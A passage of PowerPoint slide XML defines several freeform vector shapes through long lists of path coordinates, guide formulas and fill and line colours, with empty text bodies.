                      <a:pt x="44" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="131"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36129" name="Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2866" y="1817"/>
                <a:ext cx="71" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 71"/>
                  <a:gd name="T1" fmla="*/ 22 h 82"/>
                  <a:gd name="T2" fmla="*/ 10 w 71"/>
                  <a:gd name="T3" fmla="*/ 19 h 82"/>
                  <a:gd name="T4" fmla="*/ 21 w 71"/>
                  <a:gd name="T5" fmla="*/ 18 h 82"/>
                  <a:gd name="T6" fmla="*/ 29 w 71"/>
                  <a:gd name="T7" fmla="*/ 5 h 82"/>
                  <a:gd name="T8" fmla="*/ 38 w 71"/>
                  <a:gd name="T9" fmla="*/ 3 h 82"/>
                  <a:gd name="T10" fmla="*/ 40 w 71"/>
                  <a:gd name="T11" fmla="*/ 1 h 82"/>
                  <a:gd name="T12" fmla="*/ 39 w 71"/>
                  <a:gd name="T13" fmla="*/ 9 h 82"/>
                  <a:gd name="T14" fmla="*/ 37 w 71"/>
                  <a:gd name="T15" fmla="*/ 17 h 82"/>
                  <a:gd name="T16" fmla="*/ 24 w 71"/>
                  <a:gd name="T17" fmla="*/ 23 h 82"/>
                  <a:gd name="T18" fmla="*/ 18 w 71"/>
                  <a:gd name="T19" fmla="*/ 22 h 82"/>
                  <a:gd name="T20" fmla="*/ 15 w 71"/>
                  <a:gd name="T21" fmla="*/ 22 h 82"/>
                  <a:gd name="T22" fmla="*/ 12 w 71"/>
                  <a:gd name="T23" fmla="*/ 28 h 82"/>
                  <a:gd name="T24" fmla="*/ 8 w 71"/>
                  <a:gd name="T25" fmla="*/ 33 h 82"/>
                  <a:gd name="T26" fmla="*/ 6 w 71"/>
                  <a:gd name="T27" fmla="*/ 32 h 82"/>
                  <a:gd name="T28" fmla="*/ 63 w 71"/>
                  <a:gd name="T29" fmla="*/ 80 h 82"/>
                  <a:gd name="T30" fmla="*/ 60 w 71"/>
                  <a:gd name="T31" fmla="*/ 74 h 82"/>
                  <a:gd name="T32" fmla="*/ 52 w 71"/>
                  <a:gd name="T33" fmla="*/ 74 h 82"/>
                  <a:gd name="T34" fmla="*/ 49 w 71"/>
                  <a:gd name="T35" fmla="*/ 61 h 82"/>
                  <a:gd name="T36" fmla="*/ 57 w 71"/>
                  <a:gd name="T37" fmla="*/ 54 h 82"/>
                  <a:gd name="T38" fmla="*/ 63 w 71"/>
                  <a:gd name="T39" fmla="*/ 63 h 82"/>
                  <a:gd name="T40" fmla="*/ 65 w 71"/>
                  <a:gd name="T41" fmla="*/ 52 h 82"/>
                  <a:gd name="T42" fmla="*/ 71 w 71"/>
                  <a:gd name="T43" fmla="*/ 52 h 82"/>
                  <a:gd name="T44" fmla="*/ 70 w 71"/>
                  <a:gd name="T45" fmla="*/ 64 h 82"/>
                  <a:gd name="T46" fmla="*/ 66 w 71"/>
                  <a:gd name="T47" fmla="*/ 69 h 82"/>
                  <a:gd name="T48" fmla="*/ 68 w 71"/>
                  <a:gd name="T49" fmla="*/ 74 h 82"/>
                  <a:gd name="T50" fmla="*/ 63 w 71"/>
                  <a:gd name="T51" fmla="*/ 80 h 82"/>
                  <a:gd name="T52" fmla="*/ 10 w 71"/>
                  <a:gd name="T53" fmla="*/ 82 h 82"/>
                  <a:gd name="T54" fmla="*/ 10 w 71"/>
                  <a:gd name="T55" fmla="*/ 77 h 82"/>
                  <a:gd name="T56" fmla="*/ 8 w 71"/>
                  <a:gd name="T57" fmla="*/ 69 h 82"/>
                  <a:gd name="T58" fmla="*/ 3 w 71"/>
                  <a:gd name="T59" fmla="*/ 68 h 82"/>
                  <a:gd name="T60" fmla="*/ 2 w 71"/>
                  <a:gd name="T61" fmla="*/ 61 h 82"/>
                  <a:gd name="T62" fmla="*/ 5 w 71"/>
                  <a:gd name="T63" fmla="*/ 55 h 82"/>
                  <a:gd name="T64" fmla="*/ 2 w 71"/>
                  <a:gd name="T65" fmla="*/ 45 h 82"/>
                  <a:gd name="T66" fmla="*/ 5 w 71"/>
                  <a:gd name="T67" fmla="*/ 37 h 82"/>
                  <a:gd name="T68" fmla="*/ 11 w 71"/>
                  <a:gd name="T69" fmla="*/ 41 h 82"/>
                  <a:gd name="T70" fmla="*/ 16 w 71"/>
                  <a:gd name="T71" fmla="*/ 32 h 82"/>
                  <a:gd name="T72" fmla="*/ 21 w 71"/>
                  <a:gd name="T73" fmla="*/ 37 h 82"/>
                  <a:gd name="T74" fmla="*/ 22 w 71"/>
                  <a:gd name="T75" fmla="*/ 26 h 82"/>
                  <a:gd name="T76" fmla="*/ 35 w 71"/>
                  <a:gd name="T77" fmla="*/ 27 h 82"/>
                  <a:gd name="T78" fmla="*/ 37 w 71"/>
                  <a:gd name="T79" fmla="*/ 38 h 82"/>
                  <a:gd name="T80" fmla="*/ 46 w 71"/>
                  <a:gd name="T81" fmla="*/ 41 h 82"/>
                  <a:gd name="T82" fmla="*/ 39 w 71"/>
                  <a:gd name="T83" fmla="*/ 50 h 82"/>
                  <a:gd name="T84" fmla="*/ 36 w 71"/>
                  <a:gd name="T85" fmla="*/ 47 h 82"/>
                  <a:gd name="T86" fmla="*/ 35 w 71"/>
                  <a:gd name="T87" fmla="*/ 53 h 82"/>
                  <a:gd name="T88" fmla="*/ 32 w 71"/>
                  <a:gd name="T89" fmla="*/ 59 h 82"/>
                  <a:gd name="T90" fmla="*/ 27 w 71"/>
                  <a:gd name="T91" fmla="*/ 62 h 82"/>
                  <a:gd name="T92" fmla="*/ 26 w 71"/>
                  <a:gd name="T93" fmla="*/ 66 h 82"/>
                  <a:gd name="T94" fmla="*/ 24 w 71"/>
                  <a:gd name="T95" fmla="*/ 73 h 82"/>
                  <a:gd name="T96" fmla="*/ 22 w 71"/>
                  <a:gd name="T97" fmla="*/ 80 h 8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71"/>
                  <a:gd name="T148" fmla="*/ 0 h 82"/>
                  <a:gd name="T149" fmla="*/ 71 w 71"/>
                  <a:gd name="T150" fmla="*/ 82 h 82"/>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71" h="82">
                    <a:moveTo>
                      <a:pt x="3" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="63" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="80"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="24" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="81"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36130" name="Freeform 263"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2869" y="1817"/>
                <a:ext cx="37" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 28 h 34"/>
                  <a:gd name="T2" fmla="*/ 3 w 37"/>
                  <a:gd name="T3" fmla="*/ 22 h 34"/>
                  <a:gd name="T4" fmla="*/ 5 w 37"/>
                  <a:gd name="T5" fmla="*/ 18 h 34"/>
                  <a:gd name="T6" fmla="*/ 7 w 37"/>
                  <a:gd name="T7" fmla="*/ 19 h 34"/>
                  <a:gd name="T8" fmla="*/ 12 w 37"/>
                  <a:gd name="T9" fmla="*/ 19 h 34"/>
                  <a:gd name="T10" fmla="*/ 18 w 37"/>
                  <a:gd name="T11" fmla="*/ 18 h 34"/>
                  <a:gd name="T12" fmla="*/ 20 w 37"/>
                  <a:gd name="T13" fmla="*/ 16 h 34"/>
                  <a:gd name="T14" fmla="*/ 26 w 37"/>
                  <a:gd name="T15" fmla="*/ 5 h 34"/>
                  <a:gd name="T16" fmla="*/ 33 w 37"/>
                  <a:gd name="T17" fmla="*/ 3 h 34"/>
                  <a:gd name="T18" fmla="*/ 35 w 37"/>
                  <a:gd name="T19" fmla="*/ 3 h 34"/>
                  <a:gd name="T20" fmla="*/ 36 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 34"/>
                  <a:gd name="T22" fmla="*/ 37 w 37"/>
                  <a:gd name="T23" fmla="*/ 1 h 34"/>
                  <a:gd name="T24" fmla="*/ 35 w 37"/>
                  <a:gd name="T25" fmla="*/ 8 h 34"/>
                  <a:gd name="T26" fmla="*/ 36 w 37"/>
                  <a:gd name="T27" fmla="*/ 9 h 34"/>
                  <a:gd name="T28" fmla="*/ 36 w 37"/>
                  <a:gd name="T29" fmla="*/ 15 h 34"/>
                  <a:gd name="T30" fmla="*/ 34 w 37"/>
                  <a:gd name="T31" fmla="*/ 17 h 34"/>
                  <a:gd name="T32" fmla="*/ 33 w 37"/>
                  <a:gd name="T33" fmla="*/ 22 h 34"/>
                  <a:gd name="T34" fmla="*/ 21 w 37"/>
                  <a:gd name="T35" fmla="*/ 23 h 34"/>
                  <a:gd name="T36" fmla="*/ 18 w 37"/>
                  <a:gd name="T37" fmla="*/ 22 h 34"/>
                  <a:gd name="T38" fmla="*/ 15 w 37"/>
                  <a:gd name="T39" fmla="*/ 22 h 34"/>
                  <a:gd name="T40" fmla="*/ 14 w 37"/>
                  <a:gd name="T41" fmla="*/ 21 h 34"/>
                  <a:gd name="T42" fmla="*/ 12 w 37"/>
                  <a:gd name="T43" fmla="*/ 22 h 34"/>
                  <a:gd name="T44" fmla="*/ 10 w 37"/>
                  <a:gd name="T45" fmla="*/ 23 h 34"/>
                  <a:gd name="T46" fmla="*/ 9 w 37"/>
                  <a:gd name="T47" fmla="*/ 28 h 34"/>
                  <a:gd name="T48" fmla="*/ 7 w 37"/>
                  <a:gd name="T49" fmla="*/ 31 h 34"/>
                  <a:gd name="T50" fmla="*/ 5 w 37"/>
                  <a:gd name="T51" fmla="*/ 33 h 34"/>
                  <a:gd name="T52" fmla="*/ 4 w 37"/>
                  <a:gd name="T53" fmla="*/ 34 h 34"/>
                  <a:gd name="T54" fmla="*/ 3 w 37"/>
                  <a:gd name="T55" fmla="*/ 32 h 34"/>
                  <a:gd name="T56" fmla="*/ 0 w 37"/>
                  <a:gd name="T57" fmla="*/ 28 h 34"/>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37"/>
                  <a:gd name="T88" fmla="*/ 0 h 34"/>
                  <a:gd name="T89" fmla="*/ 37 w 37"/>
                  <a:gd name="T90" fmla="*/ 34 h 34"/>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37" h="34">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
